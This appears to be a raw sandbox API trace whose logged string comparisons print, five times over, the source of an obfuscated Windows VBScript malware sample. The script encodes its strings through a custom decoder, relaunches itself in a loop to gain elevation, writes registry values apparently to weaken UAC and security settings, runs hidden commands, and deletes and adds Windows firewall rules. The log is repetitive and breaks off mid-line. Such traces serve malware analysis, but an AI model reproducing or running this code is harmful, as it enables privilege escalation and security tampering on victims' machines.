bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.983] wcsncmp (_String1="= 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.983] wcsncmp (_String1=" 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.983] wcsncmp (_String1="6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0222.983] wcsncmp (_String1="\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0222.983] wcsncmp (_String1="\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 